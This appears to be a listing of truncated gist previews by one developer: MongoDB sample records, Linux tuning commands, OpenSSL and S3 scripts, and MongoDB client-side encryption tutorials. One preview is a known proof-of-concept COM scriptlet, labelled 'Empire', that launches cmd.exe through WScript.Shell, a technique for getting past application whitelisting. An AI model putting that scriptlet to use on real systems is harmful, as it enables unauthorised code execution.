kennwhite

[{
  "name": "Angela Merkel",
  "dob": {
    "$date": {
      "$numberLong": "-487900800000"
    }
  },
  "phone": "+49 30 182722720",
  "address": {
    "street": "Willy-Brandt-Straße 1",

kennwhite

# ulimit -a
# sudo sysctl net.ipv4.tcp_fastopen=3
# sudo sysctl vm.max_map_count=524288 

#  note: "-l" (max locked memory) has no soft limit 
#  apt-get install numactl

sudo sh -c "sysctl -w net.ipv4.tcp_fastopen=3 ; \
 sysctl -w vm.max_map_count=524288 ; \
 ulimit -l unlimited ; \

kennwhite

Regular expression for Sublime to find & replace and add double quotes


"$numberLong": 706213333988
to
"$numberLong": "706213333988"

Use this (make sure the [.*] button on the left is pressed)

Find:    \$numberLong": (.*)

kennwhite

// Create a native Javascript Date object set to UTC 00:00:00 timestamp
// Here, the default parameters create a plausible DOB

function randomDate( start = new Date(1935, 0, 1), end = new Date(2004, 0, 1) ) {
    var dt = new Date(+start + Math.random() * (end - start));
    dt.setUTCHours(0,0,0,0);
    return dt;
}

// Random DOB

kennwhite

#!/bin/bash

# This should be executed in a folder in your Linux Files namespace
# You can move these later, but you'll need to reference the files in nginx/apache later
# I chose: /home/kenn/nginx_tmp but /etc/nginx/xxx or /etc/ssl/xxx is probably better
# Just make sure to verify/chown to nginx-readable perms

# Generate RSA signing keys for RSA certs
# openssl genrsa -out rootCA.key 4096
# openssl genrsa -out server.key 4096

kennwhite

/*

CSFLE explicit encryption golang Hello World example 

brew install mongodb/brew/libmongocrypt

go get go.mongodb.org/mongo-driver/mongo
go get go.mongodb.org/mongo-driver/bson
go get go.mongodb.org/mongo-driver/mongo/options
go get go.mongodb.org/mongo-driver/mongo/readpref

kennwhite

<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<script language="JScript">
		<![CDATA[
	
			var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");	

kennwhite

#!/usr/bin/env bash
#
# Upload a file to the Amazon S3 service
# Usage:
#  neckbeard-push FILE S3_BUCKET [-a ACL_POLICY] [-i AWS_ACCESS_ID] [-k AWS_SECRET_KEY] [-d debug] [-l write verbose session log]
# Note: If option -l is requested, curl_session.log contains SSL handshake *and* plaintext AWS keys
#
# Ex 1: neckbeard-push foo.log my-bucket -a public-read  (with env vars: $AWS_ACCESS_ID & $AWS_SECRET_KEY)
# Ex 2: neckbeard-push foo.log my-bucket -a private -i AKIXXXXX -k aBcDeFgHxxx -d
#

kennwhite

MongoDB Client-Side Field Level Encryption (CSFLE) Using KMIP or Local Master Key (with mongosh)

Assumptions

• You have an accessible MongoDB deployment already running and accessible (self-managed or in Atlas)
• You have the modern MongoDB Shell (mongosh) installed locally on your workstation
• You have a KMIP Server running and accessible, if you don't intend to use a local keyfile (for an example of running and configuring a Hashicorp Vault development instance, see: Hashicorp Vault Configuration For MongoDB KMIP Use)

Configure Local Workstation Context Files

kennwhite

Client-Side Field Level Encryption Quickstart Part 1

Note: See KMS Best Practices guide for more specific guidance:

You should work to ensure that the corresponding key policies follow a model of least privilege. This includes ensuring that you do NOT include kms:* permissions in an IAM policy.

Note: This tutorial will create both an AWS KMS master key as well as a local key. If planning to use only a local key, skip to Step 4.

1. Create a project-specific Master Key

• In the AWS management console, create a project-specific master key:
• Key Management Service (KMS) / Customer managed keys / Create a key